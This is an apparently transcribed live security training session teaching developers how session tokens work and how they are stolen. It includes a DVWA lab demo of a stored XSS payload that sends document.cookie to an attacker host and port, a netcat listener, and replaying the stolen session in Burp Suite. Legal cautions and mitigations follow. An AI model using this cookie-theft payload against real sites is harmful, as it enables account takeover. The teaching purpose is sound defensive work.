Okay. Okay, so is everyone watching the stream who's there? We can all, if we can comment in the chat, if it's all working, that'd be good. Right, so today's session is on sessions and what they are and how they can be exploited. So this is our aim again, to teach how to hack, to teach developers how to develop secure code and to raise awareness of how small issues can spiral out into other issues that could potentially compromise the entire environment. So we're going to start at the very basic of what this issue revolves around, and that's what HTTP is as a protocol. So HTTP is Hypertext Transfer Transmission Protocol. Hypertext Transfer protocol. I can't remember. It's a completely static protocol, meaning there's no context around each packet relating to others. So it means every single HTTP request that is made must contain all the information it needs to access the resource. It can't rely on anything else before or after to allow this. So this is what a HTTP request looks like at a very basic level. So you have what method you're using, what you're trying to request, the host you're trying to get it from, your user agent, which is like sort of like the ID of your browser, all the encoding it accepts, languages it accepts, and then the important bit is what we're looking at today, is the cookie header. So here we have an anti-CSRF token, which we're going to go into it later, and then your session token here. And it's this session token that contains all your details and your basic level of privilege within the application.
Tom, can you check that screen share's on?
I think it should be.
Also, they're getting an echo. I'm not sure if we can.
Oh, it's out.
Yeah, there we go.
So, sharing.
Yeah, so that's very.
Okay, sorry, I'll go for that again. So this is your HTTP request. Basically what it looks like is your method, your host, the connection you're doing, the user agent, which is your browser, all the encodings, and then this piece here is your session token here, which contains everything to do with how much authorization you have within the app. Okay, so we're going to go into what is a session. A session is a model to represent an authenticated user accessing HTTP resources. As mentioned earlier, the HTTP protocol's got no way of identifying if a user is authenticated or not, so it must rely on a token in every single request to do this. The session token is set by the app, and once a user is successfully logged into the application, often they're set before as well for like logging and some tracking stuff, but for what we're doing here, we're just on about session tokens regarding authentication to an application. This session token is then attached to every subsequent HTTP request the browser makes. This is because if this functionality didn't exist, the user would have to re-authenticate every single time they wanted to access a restricted resource. So this token here is added to every single request. Right. So now we get onto how a session token is transmitted. Depending on the method, these session tokens are often transmitted different ways. For example, in a GET request, often the session tokens is stored within the cookie header. In POST requests, it's often stored within the cookie header as well, but it can also be posted in the parameter of the body itself. So if you go back to the request, this is the header. In a POST request, you might have some data here that contains the cookie as well. Okay, so why do these tokens need to be secure? So these session tokens are used for both authentication, but also for logging and analytics. Session tokens are unique to users, so it's extremely important that these are protected. And these are the only piece of information that distinguish users from one another. So basically, if someone can access your token, they can put it into their HTTP request and access the resources under your user context. So basically, once you log into the app, you will get a session token for yourself. So if someone has that, they can use it instead of having to log in with the user and password, because they just steal your session and put that in their requests, and then they're basically you, which isn't good. So even if your application enforces two-factor authentication, upon login, it will still just often generate a single session token. So often in an extremely targeted situation, an attacker may aim to compromise a session token for these sensitive apps. therefore bypassing the need to like break a second factor of authentication. So yeah, it's easier to steal a session token than break a second factor of authentication. So there's a few security issues that commonly come up around session tokens that we see on pen tests fairly often, some more than others. So plain text communication is not seen as much, but if an application web server doesn't implement TLS or HTTPS, a well-placed individual could sniff network traffic and see each plain text request. And as this is the whole request, the session tokens included in that, and therefore that's an issue. We have then another issue as a session token in a GET parameter. So if an application is configured to send session tokens as part of a URL, any intermediary device, such as a proxy or any other network device, often stores this in logs, the full path. So if that gets compromised or someone has access to the logs on that intermediary device, they may be able to steal your session token out of the log file in that as well.
Incidentally, this isn't unique just to session tokens. Any sensitive data that you put into a GET request is going to get snagged and probably put in the logs of any sort of intercepting a piece of software in the middle.
Yeah.
So the takeaway is just don't put any sensitive data in GET requests. It's always posted with encryption.
Yeah. And then finally is insecure token generation. So the web app, it might use an insecure method of generating session tokens. For example, incrementing a token for one for each user, which we'll see a bit later. So basically, as we're going back to these errors, this plain text communication is the same as lack of HTTPS. So if you were to sniff the traffic in Wireshark, you would see this. So Wireshark's like a network traffic analyzer, so you can go through and see every packet that's been sent. And you'll be able to see this all in plain text. And here you can see that you have the PHP session ID, which for this application is actually the session the token that you use for your authentication and authorization. So if someone can get hold of this, they can put that in their request and then log into the app as you. So a session token and a GET parameter. So as we said, this is a lot more common. Applications are often configured to have these parameters set as a GET request. For example, like this, they would have that session parameter as 1234 ABCD. But anything that's logging this URL is also going to log this parameter. So even though it's using HTTPS, an attacker may be still able to obtain the session token through compromising any intermediary device.
Really quickly, I mean, a lot of this will just be covering old ground for web developers.
Yeah.
Session tokens work on this sort of thing. But is everyone understanding where we are with this and while we're explaining the theory? Yeah. Okay, no questions.
We just want to start at the bottom and make sure everyone has that same base level before we go a bit further. And then insecure token generation. So the application may be insecurely configured to generate weak session tokens. These tokens could then subsequently be guessed or reverse engineered, and then could lead to an account being compromised. For example, if the app's developed to assign a session token based on a hash of a username, it would be trivial to reverse engineer it. For example, if you found that you were pen testing a site and you could put in the username of Tom Hacker and found that every time the session token generated was this string, you might then be able to see that it's from the length and the character set, you'd be able to simply identify it might be an MD5 hash of the username. As a result, it would then be trivial to simply identify other usernames in the application, generate an MD5 hash of their username, and then subsequently log in with that session token. Does that make sense to everyone?
So a little background on this one. So I've seen MD5 used, several of the SHA hash generation functions used. And it's really easy to test for this because we just use graphics cards to try billions of combinations at once. And we can graph these pretty easily. I mean, even if it looks really complex, a lot of times we'll just throw it at a cracker and import the output. So
Or often it's base 64 as well, so you can simply decode it and see the contents.
So you can go to the repository, so you call.
Or you could do that, yeah.
yeah,
It depends on the sort of engagement. If it's like a white box or black box engagement.
yeah. Sometimes we don't see the code, but we can kind of.
Yeah.
There are certain techniques that people tend to use, so we'll try to basic decode it, and we still get something strange, but something that matches the hash. We'll throw it in a crowd and see
Yeah.
what that gets us.
Cool. This is probably the most common issue that I see when testing apps, is that the logout function doesn't work as it should, or it doesn't fully perform a complete logout. So often the session token will be invalidated on the client side, and a new one's generated by the app. But on the server side, the token's still valid until it expires. So often, as a result of this, an attacker who's compromised the user session, they might then have indefinite access to that account using an old token. This happens all the time when you click the logout button and it appears like you're logged out. But if you do another request for the old session token, that is still valid and that still works. This is really common. Okay, so there's more surrounding issues, not directly to do with sessions, but kind of. So the session token might be generated securely. The application web server might be secured as well using HTTPS and only posting cookies. But the underlying application might have a security issue. For example, if there's a cross-site scripting vulnerability in the web app and the cookie's not protected, which we'll go on to later, an attacker may be able to steal a user session token through this vulnerability. So how does an attacker use these sessions that they've stolen? If an attacker's been able to obtain a valid session token for the application, they need a method of using it to communicate with the application web server. So there's multiple tools we can use for this, but the most widely used and considered the best one is a HTTP proxy called Burp Suite. So it's a HTTP and HTTPS proxy tool that contains multiple tools and features that a hacker or pen tester can use. Basically, all it does is capture requests, both HTTP and HTTPS requests that can then be modified and sent on. So if you want to modify specific strings, you can use Burp Suite to intercept the original request, modify a parameter, and then send it off. So to configure Burp Suite, you must first install its CA certificate into your trusted CA cert in trusted CA location. This means when you're trying to proxy HTTPS, the web browser doesn't give an untrusted cert error, meaning that you can see the contents of the HTTPS requests. And then you will need to configure your browser to use the Burp Suite proxy on HTTP 127.0.0.1 port 8080. And then if this is set up correctly, you should be able to see a HTTP request appear in Burp. So we're going to do that now just to make sure everyone's got it set up properly. Does everyone have Burp installed? No. So I sent a link, I think, a couple of days ago on the security champions channel.
Has everyone used an intercepting proxy before, like Charles Proxy or Paris Proxy?
No.
Right. Do you get the concept behind it then? Essentially, the browser communicates with the server, and the proxy stands in the middle of the two. It intercepts the request and response, and then you can basically mess with this. I think that's what we do. Okay. So
if we can all install Burp, I think I put it in the channel.
Yeah, it's just on Wednesday.
Yeah, up here. So Community Edition should be fine.
So Will Clark, if you have Brew installed, he's pointing out that you can also just issue a Brew install Burp,
Yeah, all that.
which might be easier.
Yeah. Are you in the Security Champions Slack channel? No.
To be honest, you might not be able to do it on one machine.
No, you probably won't be able to do it on that.
But
Still watch.
James is calling you out, Tom.
I'm pretty sure I did it. I just did it online
Okay.
on MD5 thing.
Possibly that.
Um,
Yeah, it's difficult for a developer to build applications on Dumble issues just because they're so locked down. Yeah.
so has everyone got that installed? Cool. Everyone else? Yeah.
Just quickly doing your Foxy proxy.
Yeah, it makes it a lot easier if you just download that plugin as well. Just you can then easily switch between a proxy on and proxy off. So basically, how Burp works is Burp will spin up a local service running on this 127.0.0.1, so a local interface on port 8080. So then to work with Burp, you have to then configure your browser to use this port as its proxy. Sorry, it's not very big, but so what I use is a plugin called Foxy Proxy on Chrome. You can just go to options, add a new proxy, put your IP address in, so 127.0.0.1, give it a port 8080. Then go to
Is it standard or basic you use?
for what?
Basic will work.
Sorry, basic.
Yeah, just it shouldn't matter.
You're not using advanced functionality, just telling the browser to go to the proxy instead of site.
Saying download failed to check your connection, but I've got connection.
Oh, is this the, are you using Firefox?
Yeah.
Of course you are. Yeah, so, Firefox.
Does it work on Chrome as well? Because I tried it with Chrome.
It will work in Chrome. Maybe not that plugin. What's a proxy plugin for Chrome?
No, that's what I was using. Foxy
For
Proxy.
Chrome?
Yeah.
Okay. Yeah, try that.
So yeah, if you then save that
I
there,
clicked on the Firefox one.
Oh,
then you can see.
Let's say I thought you were coming across and you heard that intermediate CA issue that Firefox had.
No.
Say they let
Yes, so once you've got Foxy Proxy, once you've got Foxy Proxy using Burp, you then have to install your root CA for Burp. So if you simply go to HTTP Burp, not HTTPS, you should then see this page. So once everyone's there, yeah, everyone got that? Cool. And then if you click CA cert, what that will do is that will download the certificate file for Burp. If you then click that, you should then, wherever it is, should pop up in a minute. You should then be able to install that certificate.
Or I'm not getting it.
Are you proxy? Is your proxy set up to use?
Oh,
So I think if you click
there it
that,
is.
yeah. So you need to add. So if you go to options and then add new proxy, and then 127.0.0.1, and then port 8080.
Being like behind some.
Yeah.
Yeah, exactly what it is.
Yeah, it should be working. It says it's working.
Is that all I needed to do there?
Yeah, and then if you you then have to just make sure it's on. So click the little thing, click that,
Oh, this one.
Yep. and then it should work.
Yay.
So has that worked for everyone so far? Yeah. It probably will break your internet, yeah, because you're proxying through this, and if the sites using HSTS, things like that, the cert will be different, so it'll just kill them. So once we've done that, we should then go, if we can go back to Burp Suite, load it up, click proxy at the top, and then go to intercept. And if you turn intercept on, if we then make a request using the browser we've just proxied, so you want to go to Google Mock Break, this is HTTPS, but we can see, probably not the best example. Yeah, you will for all sites that use HSTS. Like if you connect it with their cert and now you connect it with a different cert, it will break. The browser will just say no. So say you want to go to a site we're going to use, which is this 35.178.18.133. And then Slack quickly.
18.133.
Yeah, so I just put it in the channel. We should then see a request, but you go to all this other stuff first.
Might be worth making a target list.
Yeah. I'll just close the other. So you should see there that the browser's going to hang because it's waiting for Burp to do something with the request. We can either forward it, we can drop the request, we can modify this. So if we want to change things in here, we can change that. But yeah, has everyone got to the stage where they can intercept a basic HTTP request?
I just keep getting terms and connections not private.
Did you install the root CA? Because basically, because the Burp certificate is not a approved cert by, I don't know, like whoever, like a root CA somewhere. You have to install it as a root CA explicitly on your machine because it's not built in. It's not like a Google cert that's been signed. It's a tool that you then have to install manually.
Okay. So it's
So you got it working, did you? Good. Have you got it working over there in that corner? Yeah. Good.
Sorry, I wasn't.
Let me send. I'll put the credentials on the app.
So basically, it's catching the requests that the browser are making. If you set it to intercept this, you can modify it. You just allow it to pass through and still see all the requests.
Okay, so everyone's kind of got to that point, have they? Where you can now intercept some traffic. Okay, good. For this exercise, we don't really need to use the CA cert because it's all over HTTP anyway. But if you were testing a HTTPS site, then that's where you'd have to install the cert. So I wanted to do it anyway. Okay, so everyone can refresh the page and they can see the request here that's just hanging. Yep. So in Burp, we can modify this so we can forward or drop it or whatever. So I'm just going to turn intercept off, and then in the browser, the request should go through, and as you can see, there's no spinning thing there, which means it's gone through. So there's loads of tools, loads of things we can do with Burp. It's a really, really good tool. There's multiple plugins for it that people have written. It's really, really good. So this is how we would use Burp to utilize stolen sessions. Because we can modify a HTTP request within Burp, we can simply copy the stolen session cookie into our request to then authenticate as that user. So if we were going to, for example, log in, if we wanted to access this application again as a different user, wherever it is. So here, this is the request to this user. I want to see if we can zoom in a bit. No. Trying to zoom. One sec. Okay, that's not quite working. But yeah, in here, this is a HTTP request. So if you can modify this session here. If you've got a session you've stolen, we can simply paste it into here, let the request go, and then on the application, we'll then be authenticated as that user. Does that make sense, the concept of that? Yeah? Good. So, performing the exercise, what we're going to do, we're going to imagine we're a low privilege user on a message board application. So you might have found a stored XSS issue where your input's not validated. You performed some recon and you found the cookies aren't protected with appropriate security flags, and you can make a comment on the application that contains your malicious JavaScript string. But in this case, you find the string's a bit too long to do in the browser due to some client-side filtering. So, for example, the page we look at, we're going to go onto this application. I want to zoom this in a bit. We are going to go to this, whatever it is, so stored XSS. So imagine this is a site that you can post a review of your holiday or whatever. You can put your name, you can put your message. Holiday was great, and then sign the guest book. What that will do then is that will save it in the application, and then the application will then send it to the server. The server will then send it back, and the application will display it on the screen. But we can see here that potentially as an attacker, I would see if any input I'm putting in is getting reflected back to the screen or stored in the application. I've then potentially got a stored XSS issue. So if I say my name again is Tom2 and my message, I want to put in some, say, HTML to do something. I could do a simple alert box that when I put it in, go back to the page, we can see that we've caused some HTML code to run on the page, some JavaScript to do an alert box just containing 1. Yep. So this is the issue. This is the cross-site scripting issue that we can then use to actually steal a session token. So you might have to go off it and then back. I just cleared it, so it's probably gone now. Just because I don't want alerts popping up for everyone, because it'll just be annoying. So say we wanted to put in some code now to, instead of, still imagine you're a low privilege user, but you want to steal some other sessions from other people. We want to put some code in that will send us their session tokens back to us just using JavaScript. So if we go through this, we can see that the payload we want to use is going to be something like this. So we've got some script tags. We've then got a document.location, which is where we want the application to make a request to. So this is our attacking machine on port 1337, and then we want to send it this document.cookie, which this is the piece that contains the session ID for that user. So if we do like another one, but a script alert, we should then see document.cookie. So we can see there that it's done an alert and it's shown us this that the session token we're using is here. So
Everybody get what that piece of code does. Does everyone understand the DOM and document.cookie, what that represents? Yeah? Okay.
yeah, so this is the same as if we were to intercept the request in BERT. This string will be the same as what we would see in the cookie header for this. So an alert's not very good. We want to do something with it. So we want to send it to our remote machine over the internet, so we can basically script something to steal all the session tokens. So everyone who accesses that site, their session token will be sent to our attacking machine. So we are going to try and use this piece of code. So we're going to log onto, first of all, we need to open up a port on our attacking machine to get the connection going back to. So similar to what we did last session, we want to be able to, if you log in with your user onto the attacking machine that we set up, that I sent details for, we want to then do the same sort of thing. We want to open up a network port that we can accept connections on. So as we did last time to get the reverse shell back, we're now going to be, instead of getting a reverse shell, we're going to be getting a HTTP request to that port. Does that make sense to everyone? So we're going to do a tool again called netcat, which is what we did before. -n DLP to listen, and we're going to give it a port. So for example, I'm going to do it on port 1337 because that's what's there. So it should be, we can now copy that code in, which we can't do out there. Gonna be lazy. So we should be able to put name as Tom, message as that, but we can see it's too long. So the payload we want to use is too long, and that's not good for us, because then we can't do what we want to do. So what we can do to get around it is we can actually use burp to bypass this client side like length filtering sort of thing. So if we turn intercept on, we can then sign the guest, and we can see here, I wish this would zoom in a bit. It's a bit hard to see, I'm sorry. Let me close it.
There's a weird keyboard combination that makes
Yeah.
If it's client side, you can also use the Slash one.
Yeah, you could use that as well. Yeah, you could use any. You could use that. You could use burp. You could use anything that's gonna.
Tamper data is another good one, little Chrome extension.
Why is that not loading? Doesn't want to load.
Is it going to another window?
Don't know. I don't think so.
Weird.
That is weird.
CSCF grep Java.
Dead. Yeah. I've never had that before.
You might have to switch it off and switch it back on again.
Oh, please no.
The ultimate.
Well, yeah, why don't you just install tempered in there?
To be honest, we can just do it in the browser anyway. That's really weird why it's not working. The other one's not working. No. Just said no.
Those technical issues.
Why is that not working?
No, it was just okay.
Burp is just refusing.
But everyone's got to that stage. That is very annoying. Don't know. It's gone. Cheers, Bert. No. I might instead. See if we can get around this quickly. Put it installed. Yeah, sorry about this. Wasn't expecting this to happen.
Demo gods.
Sorry, Joel's trying to entertain us all.
So we're missing out on the photo channel.
God,
Where are my keys? Can't find it. What's my burp key? I don't know.
Yeah, so it wasn't that.
Oh, where is my key?
Only if we use the same port.
No.
No,
Oh, I need to find it for this.
yeah, but again, one is they said they're all running, but so one is you using your running that.
And it's the browser.
Yeah. With the browser, so the browser send that to the so neck that is just the raw software. It's there. It's just
Yeah. So what is browser is going to navigate to the main slot.
So, what's this one? Sorry, almost there. Keys up front. So okay, right. So we can kind of get back onto it. So sorry. So if we go back to where we were, I don't know why Bert died for me. But so if we want to do this XSS payload of choice here, we've seen that it's too long. So even if we go onto where my VM's gone here, this payload is too long. So we need to bypass that sort of client side filtering. Unfortunately, I'm going to have to keep coming out and in a bit again. But that's not going to be an issue. I just installed it again on a virtual machine quickly. So I'm sure if we come here, so if we clear the guest book again, so like we said before, we want to bypass that length filtering. So we want to put in we can put the payloads whatever, but then we want to intercept this request. It's really blurry, but you have to excuse that. And then we can see here that our request is being captured. And that is really, really blurry, but I mean, it's the best kind of we have at the moment. So we need to change this message to our payload that we want to use. So the payload we want to do is this. What I would see though is whenever I use this payload, this character, the plus, that is going to be interpreted as a space because of the RFC. So what we have to do is instead we have to URL encode this character. So our actual payload instead looks like exactly the same, but our percentage 2B, that's the plus that has been URL encoded, so the application accepts it. Otherwise, if we were to send this payload here, what would happen is you would see it reflected onto the page, but it would never send a cookie because it would interpret this plus as a space. So we have to do something called URL encoding, and the URL encoding of that character turns to a percentage to B. So we should be able to copy this command, put it into our message, which is here. And we can see now that, though it's very blurry, we can still see that the message we're going to post is this. So first what we need to do as well is get our listener set up again. So we're listening on that local port 1337, and then what we should see is that once this has been sent, we go back onto the application, click on something else, then go onto this again. What it should do in the background is it should send the message. Oh, it's because so many other people are doing it. Because all these people are doing it as well. So if everyone again picks a different port to use, that would be an easier way to do it. You just have to change the payload. So let me talk. So yeah, so if everyone picks a different port, it will then be easier. So if I use the one that's there, we can then do the demonstration again, which we have to just go through again quickly. So it's a bit off. Sign that. Copy this. So that should now be stored in the application. So as you can see, it's probably going to be in there somewhere. And then if we go back to our listener, oh, why is it not going through? It should have gone through. Okay, so you can see the error is that there's some special character that's been put in there that's breaking it. So instead, if we just copy it, we try that again without.
That's not a security measure.
No, that's not a security. Let's say it's probably something out of PowerPoint copying. So we'll try that again. Back onto the browser. So the issue was there was some special character in there that was basically breaking it. So a lot of testing is like this, is where you have a lot of things go wrong and you've got to work out what's happening. But it's probably still intercepting. So if I clear that again, go through it one more time, make sure we get the right payload in there. So we're going to set BERT to intercept. Whatever it is, send the message. And this is now where we want to put in our payload. Script. Location to R. So this is where we put in, we're just going to write it in so we don't get any dodgy characters. Equals HTTP 35 dot whatever the URL was 178.143.143.107. 7. Yeah. Slash. Then we want it. This is now where we want to add in our special character encoding. So there, percentage 2B plus then we need to add our document document.cookie. So instead of the plus, we've already got that in there. So we put a document.cookie, and then we can close the string and close the script tags. So you can see here we're now sending a cleansed message, I would say. I'm just going to copy that. So document.location, we're going to get the application to request to get a resource from this area, from this server, on this port, and then it's going to send its cookie as well. So hopefully this goes a bit cleaner into the application. Oh, need to put that. And what we should see now is hopefully this better work. So if you turn intercept off, it will send it through.
Oh, right, okay. So did you get it back?
I think someone cleared it, so it didn't go in.
Those things, if you just want to talk to the server directly, turns it off, it'll still pass through the browser.
Yeah.
So they'll see everything, just it won't catch everything.
Yeah. Okay, so we can see then that's gone through. And why is it not going through? Oh, I tested this so many times.
Oh, right. The previous
It is good.
It wasn't- So here's the request. We should modify this to now contain thing.
Do you need to close off your
Should be okay.
oh no.
Yeah. Okay, so it went through. You can see it there. So if we go to our reflected and then we go back to stored, this should now run in the background. Okay, so it finally came through. I don't know what was going on. It must have been some special characters. But we can see that now on our attacking server, we've actually received a connection that contains our PHP session ID for that user. So sorry, it was a bit of a bad demonstration, but
Is that
Bert
your
kept dying.
session? Your own,
So
like,
this
getting
will-
your own.
So this will be any user that then views this message board application will then send
Oh, right,
send
right.
theirs, because what it's doing in the background is the code is running the document.cookie, which will then use JavaScript in the browser to access their cookie and then send it off. So if you can get this on a message board app or something similar, and you get an admin views the message,
That to run every time.
yeah,
You're proof of concepting it with Borrow.
yes. So if an admin logs into that page and they see it, and this payload executes, then you'll get an admin token sent to your browser, sent to your listening host, which you can then use to authenticate.
So you're hoping that your cross-site scripting vulnerability is getting saved in a database,
Or in the
or just
application,
reflected back
yeah,
on the screen.
stored cross-site scripting, or you could even send this sort of payload. If you had a reflected cross-site scripting, you could say you had a string you could send that was vulnerable. You could send that to an admin, say, "Can you have a look at this? I think my app's broken." They click it, and then you get their session sent to you.
It just depends on where it's injectable. If
Yeah.
It's like the get, you can just send that URL.
Yeah. Yeah.
But yeah, in the meantime, someone's just waiting in the background,
Yeah,
for you
waiting for this sort of
to
connection.
send them your cookies, and then they'll immediately use those cookies, log in as you
Yeah.
before the cookies time out.
And probably change your password
Exactly. Yeah.
or whatever else. Depends how it's implemented, but yeah.
And it's
So-
kind of terrifying, isn't it? So how do you pick this up in applications? with
So-
this kind of vulnerability.
Yep. So I'm going to go on to that in a sec.
I've got a special talent for jumping on here. Sorry.
So sorry, it was a bit of a shit demonstration, but basically the concept is we find an XSS issue. We can then input our code. That what it does is it will then send whoever accesses that page, it will send their session token to our remote server that we've got listening, and then we can script up a tool, say in Python, that pulls this out and then authenticates the app. So that's how it works. Sorry, but what can you do?
Never seen that.
No, I've never seen it before, but so from here, so this is what it looks like. We put in the payload here, and then this is the output we get, as we just saw in the live demo, but this is what it would look like in a terminal.
That worked for everybody, by the way.
I mean, if you'll try it on different ports, then it should work. But if not, we can always do. I'll keep this machine up over the weekend as well, and until probably Monday or Tuesday, so people can try it, and then we can go through this as well. So as we can see here, so what we would do is once we have this session token that we've stolen, for example, we can copy it out of here, make another request in Burp, and just paste that token in where ours originally was. We can just put this in. And as this is a stored XSS issue, every user who actually accesses this message board will submit their cookie to our attacking machine, as long as our listener is there to take it.
So obviously you can do these kinds of, you can run this tool over anybody's website, right?
Yep.
So at what point do you start to break the law? Because when I had my training on this, they couldn't stop saying, ask for permission, get it in writing, don't just hack things.
Yeah, of course.
Like, at what point does this become a problem? If people are like, oh, you know, I'm going to go and run this on any old website.
Yeah, you have to have permission. It's all under Computer Misuse Act. So you have to have permission. You have to have intent as well.
So
They're the two main things, really. So this is all stuff we've set up in a test environment. I mean, you
So
can.
wouldn't advise people that go away and just try and do this stuff against any old website.
No, I mean you can
that's a really
can.
good point. So
yeah.
basically, if it's not yours and you're doing any exploitation
Yeah.
whatsoever, even if it's minor, that's breaking the law.
Yeah.
Do it.
But if you wanted to go and see how an application worked, how its authentication model worked, you could still use Burp and you can proxy the traffic through. There's nothing wrong with that because all you'll get is your own session stuff and you might see some other bits. But yeah, I would say if you wanted to do something, just look at bug bounties, and then you have permission. You have blanket permission on whatever domains they're covering, or set up your own lab similar to this. But yeah, just make sure you have permission first.
It's been done.
Or if you do something by accident. So say I try and launch a port scan against a site, but I've got the URL wrong by one character, for example, or the IP wrong by one character. Because there's no actual intent to hack that website, you're kind of covered by it because it's an accident.
Kind of. But
Kinda, it's
yeah,
really blurry.
It's not something you want to really wade into.
Yeah.
It's intense, kind of a matter of interpretation. And,
Yeah,
how people are reacting
Yeah.
to it.
And that's why they say get permission in writing, like don't
Yeah.
trust verbal permission. And even if you started to try and like do this sort of against SOP or some other internal thing, that could get you fired, right?
Oh yeah.
because it's breaking the law.
Yeah.
So we as a testing team, even though we're employed by the MOJ and we're testing mod systems, we always get permission
Yeah.
permission in writing from the application owner, and for everyone we need to
Yeah.
just recover, because it has happened that people are prosecuted for doing what they thought was their job, but they didn't have sufficient level of permission.
And even sometimes people like hackers on the internet will find, say they might find an issue in Google and they might report it to Google, and then Google might press charges on them for Computer Misuse Act because they've hacked into a Google service. I mean, Google are probably not the best example, but a company could actually press charges against you for computer misuse, even though you helped them find a bug, which is why people go for bug bounties rather than that. So we can see there we just logged in as that. So some protections for these sessions. We've gone over the attacks, but we now want to know how we can actually protect ourselves. Now we can develop secure code. There's various cookie flags we can set on cookies by the application. So there's a secure flag we can set, which ensures that cookies are only ever sent over encrypted channels. So if you have an application that, for example, I don't know, the HTTPS server or the HTTPS cert expires and you can't get a proper connection, it will never send the cookie over a plain text channel or a bad HTTPS channel. Also, you then have the HTTP only flag. So this can be set to ensure the cookie can't be accessed by JavaScript. So, for example, in our demonstration, if this HTTP only flag was set, we wouldn't be able to see it from the document.cookie JavaScript function. Does that make sense? But it's really important that these cookies are set, and it's up to the browser what it wants to do with them. So the browser might not always honor it. It's quite uncommon, but if you have an individual using a very outdated or custom browser, then there's more risk involved with that, which is why defensive directives should be applied. So someone's got a custom browser they've written that they don't want to have processed these HTTP only flags so they can see all the cookies, then that's that. But the attack vector is really small because everyone else normally uses Chrome or Firefox. So yeah. Okay, so how we would go mitigating these various issues. So plain text communication, it's really easy to fix. We implement TLS to encapsulate all HTTP traffic in a layer of encryption. We'd also then set the secure flag on the cookies to ensure they're always only ever transmitted over an encrypted channel. Session token in get parameters. So this is where it's in the URL. We'd modify it so instead it sends cookies within a request body as a post request over HTTPS. Insecure token generation, we'd recommend to use strong frameworks to ensure session token entropy is sufficient and session tokens can't be guessed or reverse engineered. Often we find that when we're testing something that's been developed with a framework that's been tested over and over and over, we find that that is much more secure than someone who's tried to implement their own token-based authentication sort of thing, because they will have undoubtedly missed something that a framework will have probably covered. The logout function not working is another thing. It's fairly difficult to implement from a developing point of view, but the application could be configured to ensure that the session state is deleted on the server side as well as it is on the client side. Failing this, a shorter cookie timeout could be set. So even if an attacker can use that old session token, it will expire after, say, 15 minutes. So there's sometimes I've been on jobs where the session token will last for a whole day, which is a lot of time for an attacker to have a look around. So if we have it terminate for 15 minutes, that's great of inactivity.
But
We've also
someone,
seen, sorry.
someone can use that and then change the password while they're in, right?
Depending on how the password
Or is it sending
reset.
an email to the user?
Yeah, or if it's because often when you change a password, you have to put in the old password first, and with this, you won't know the old password. So that's another issue we find. If you're testing an app and you can change a password without putting the old one in, then that's a security issue as well, for this exact reason.
So with logout, obviously the server side, the token should be invalidated immediately.
Yeah.
We've also seen cases where even where a cookie timeout is set client side, the server will still honor as after
Yeah.
the timeout time. So those two things have to be checked.
Yeah, and it's quite a hard thing to implement. ASP don't even do it. They don't even bother with the logout function working on the server side. They just set an expiry date. But other frameworks are actually a little bit better.
It's the hook and pray approach, which just doesn't work when you have
Yeah.
going out to the application.
And then the final mitigation for cross-site scripting to prevent someone being able to grab the session token out of JavaScript is to ensure adequate input validations performed on strings on the server side, not trusting a client to perform any of this. Furthermore, output encoding should be put in to encode to HTML encode any special characters that get reflected back into the application. Furthermore, setting the HTTP only flag will also ensure that cookies can't be accessed with JavaScript functions. So this HTTP only flag is good, but there are certain functions and certain other ways you can get the cookie using JavaScript or any other object. So none of it's perfect. It's just a defense in depth, making sure we have all these layers put in.
Quick question then. If it's really difficult to get rid of the session on the server side, what do you recommend then? Because you can configure your application to write sessions to the file, to
Yeah.
Redis.
Yeah.
Is that preferable then? To make that easier?
Yes, so normally we would say use a framework that can do it. If you can do it. If not, we would say put a smaller window on your cookie timeouts. So if you had originally a cookie set for an hour, we would say set it for 15 minutes of inactivity. So even if you log out and that user is then not going to be using that old cookie, it expires after 15 minutes on the server. So there's still a slight window of risk if an attacker can steal it. And also there should be some sort of logging. So if you've got a user that's logged in multiple places, you don't want to know if your application should only have one user logged in from one place. Then there should be some sort of logging there to say why is a user logged in from 2 different places. But it depends on your application. Often you can have multiple concurrent sessions, such as Facebook. You can log in your phone or your laptop or anything. But if you're on a, say, confidential banking app, you can only log in from one place. That's where you need that check-in to be put in. So there's a few bits, and I think that is it for that.
Yeah.
Does anyone have any questions? Sorry again, the presentation or the demo didn't go desperately well, but
I think it went really well. You beat yourself up a lot.
technically it didn't go as well as I wanted, but I can't do anything about that.
Yeah, any good, well, especially bad feedback goes to Tom. He's developed all of these things, all of these demonstrations and the curriculum. So, and he's put a lot of time and effort into it. So, I would thank him for having done that.
But we need some any questions for anyone about any of it?
Like to go back and do like say like on like this session or the previous ones.
Yeah.
Do you have to set something running up basically?
So what I've done is there is so this site is publicly facing. It's just locked with. It's just locked with a basic auth. So that's SecChamp's password you put in the beginning. So anyone can access this from anywhere in the world, as long as they have that password, which isn't very good, but there's nothing on it, and then the password's strong enough, so it should be fine. So you can use this as a platform to attack. The only thing you would probably have to set up is the attacking server, which is what I set up for everyone when you log in. So if you can set that up, then you should be fine to go from there.
And what is that, just a virtual machine?
I set it up in Amazon, yeah, so it's just an EC2 instance. So a virtual machine might not work because you won't be able to get the connection back due to that, which is why I did Amazon, because everything's open if you set a security group.
So we're not there yet, but we have ambitions of turning these demo environments into as code and then open sourcing it.
Yeah.
So anyone, I'm not very sure yet how to do that entirely. Sometimes we might use Terraform, otherwise it might just be a Docker file. That's on the roadmap. So once that's done, we can keep these things in your own environment.
Yeah. I mean, you can feel free to install this. This is free software. This DVWA stuff. So you can run that in a virtual machine, then just have another attacking virtual machine. Rather than doing it over the internet, you just do it all locally.
So you said you were going to say something about how you as a red team pick up the kind of vulnerabilities that you exploited there.
Yes. So we would see if Burp actually opens again.
Do you run like vulnerability scans on a regular basis, and that's where you're getting your info from?
So yeah, so we would find these sort of issues. So it depends what sort of issue you're on about, really.
The one today, the cross-site scripting vulnerability.
So something like that would probably, it kind of stands out to me quite a lot, because you can see that whatever you put in is getting reflected back.
But that's through manually testing.
So this is manual testing.
Yeah.
So how you do that at scale is you run something designed to pick up that sort of problem.
So yeah, why I say Burp is so good is there are modules in here you can like do active scanning of. Although you don't often do it because sometimes it breaks sites, depending on what functions it calls. But there's really like loads and loads and loads of additions we can put into Burp as well, like people have customly written for like doing this exact thing. So I don't know if there's an XSS. There's like XSS validator here. So this will run. There's like active scan ++, which is really good. So this will run in the background and will do some like light touch probing for you. So when you see your target, for example, here, we can see that this is the target we've attacking. Where did that go?
But generally, the process is we'll land on an application, we'll spider it to enumerate the whole of the application, we'll figure out where the potential injection points are, so all the parameters get post all of the different verbs, as well as sort of active content.
It's got little tools in there to pull those things
So
up,
it does,
doesn't
yeah.
It's all programmatic, and then we can just fire a laundry list of CSS strings, including filter bypasses at the injection points, and then just see if it gets reflected or the DOM chains or stored. You actually have to get to it via another page.
